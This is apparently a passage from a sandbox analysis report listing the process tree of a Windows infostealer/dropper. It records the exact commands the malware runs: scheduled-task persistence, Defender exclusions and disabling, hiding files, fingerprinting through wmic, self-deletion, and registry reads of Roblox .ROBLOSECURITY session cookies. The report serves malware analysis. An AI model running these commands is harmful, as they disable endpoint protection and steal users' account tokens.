      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4188
- C:\Users\Admin\AppData\Local\Temp\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:948
- - C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
    "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
    3⤵
    - Executes dropped EXE
    PID:3608
- - C:\Users\Admin\AppData\Local\Temp\Server.exe
    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3192
  - - C:\Users\Admin\AppData\Roaming\Server.exe
      "C:\Users\Admin\AppData\Roaming\Server.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2928
  - - C:\Users\Admin\AppData\Roaming\conhost.exe
      "C:\Users\Admin\AppData\Roaming\conhost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:480
- - C:\Users\Admin\AppData\Local\Temp\loader.exe
    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2776
  - - C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
      "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
      4⤵
      Executes dropped EXE
      PID:5076
  - - C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      4⤵
      Executes dropped EXE
      PID:4716
    - - C:\Users\Admin\AppData\Roaming\Server.exe
        
        "C:\Users\Admin\AppData\Roaming\Server.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4124
    - - C:\Users\Admin\AppData\Roaming\conhost.exe
        
        "C:\Users\Admin\AppData\Roaming\conhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:4212
  - - C:\Users\Admin\AppData\Local\Temp\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\loader.exe"
      4⤵
      Executes dropped EXE
      PID:3152
    - - C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        5⤵
        Executes dropped EXE
        
        PID:2956
    - - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:536
    - - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        5⤵
        Executes dropped EXE
        
        PID:1404
      - C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        6⤵
        Executes dropped EXE
        
        PID:3552
      - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1112
      - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        6⤵
        Executes dropped EXE
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        7⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2692
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        8⤵
        
        PID:3104
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        8⤵
        Views/modifies file attributes
        
        PID:2832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2888
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        8⤵
        
        PID:3804
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        8⤵
        
        PID:4508
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:3552
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        8⤵
        
        PID:2824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2284
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        8⤵
        Detects videocard installed
        
        PID:2476
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2012
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:3548
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5108
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        7⤵
        Executes dropped EXE
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        8⤵
        Executes dropped EXE
        
        PID:560
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4316
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        8⤵
        Executes dropped EXE
        
        PID:4268
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        9⤵
        Executes dropped EXE
        
        PID:232
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        9⤵
        Executes dropped EXE
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        10⤵
        Executes dropped EXE
        
        PID:1732
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3468
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        10⤵
        Executes dropped EXE
        
        PID:3132
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        11⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3100
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        12⤵
        
        PID:2068
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        12⤵
        Views/modifies file attributes
        
        PID:1296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3804
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        12⤵
        
        PID:3448
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        12⤵
        
        PID:4464
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        12⤵
        
        PID:2016
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:5108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2504
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        12⤵
        Detects videocard installed
        
        PID:988
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4628
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4124
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5088
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        11⤵
        Executes dropped EXE
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        12⤵
        Executes dropped EXE
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        12⤵
        Executes dropped EXE
        
        PID:1916
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        13⤵
        Executes dropped EXE
        
        PID:1772
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        13⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1428
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        13⤵
        Executes dropped EXE
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        14⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4136
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:2128
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        15⤵
        Views/modifies file attributes
        
        PID:4904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        
        PID:2412
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        15⤵
        
        PID:3132
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        15⤵
        
        PID:572
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:4832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:656
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        15⤵
        Detects videocard installed
        
        PID:4164
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2864
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3728
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        14⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        14⤵
        Executes dropped EXE
        
        PID:3144
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        15⤵
        Executes dropped EXE
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        15⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3668
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        15⤵
        Executes dropped EXE
        
        PID:956
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        16⤵
        Executes dropped EXE
        
        PID:1436
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        16⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3820
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        16⤵
        Executes dropped EXE
        
        PID:1004
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        17⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:792
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:3240
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        18⤵
        Views/modifies file attributes
        
        PID:1956
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        19⤵
        
        PID:956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        
        PID:4548
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        18⤵
        
        PID:4980
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        18⤵
        
        PID:4160
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:1744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1032
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        19⤵
        
        PID:2016
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        18⤵
        Detects videocard installed
        
        PID:3740
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        19⤵
        
        PID:4832
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1424
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:556
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        17⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1548
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        17⤵
        Executes dropped EXE
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        18⤵
        Executes dropped EXE
        
        PID:2336
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        18⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2940
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        18⤵
        Executes dropped EXE
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        19⤵
        Executes dropped EXE
        
        PID:4016
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        19⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3736
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        19⤵
        Executes dropped EXE
        
        PID:1004
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        20⤵
        Drops file in Drivers directory
        
        PID:892
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        21⤵
        
        PID:2300
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        21⤵
        Views/modifies file attributes
        
        PID:2744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        
        PID:2384
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        21⤵
        
        PID:4240
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        21⤵
        
        PID:3592
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        21⤵
        
        PID:3624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2244
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        21⤵
        Detects videocard installed
        
        PID:2628
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
        21⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3144
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3660
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        20⤵
        System Location Discovery: System Language Discovery
        
        PID:3820
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        20⤵
        
        PID:3768
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        21⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        21⤵
        System Location Discovery: System Language Discovery
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        21⤵
        
        PID:2876
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        22⤵
        
        PID:1956
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        22⤵
        System Location Discovery: System Language Discovery
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        22⤵
        
        PID:2892
        
        C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        23⤵
        Drops file in Drivers directory
        
        PID:560
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:5032
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        24⤵
        Views/modifies file attributes
        
        PID:1280
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        25⤵
        
        PID:4164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        
        PID:2940
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        24⤵
        
        PID:644
        
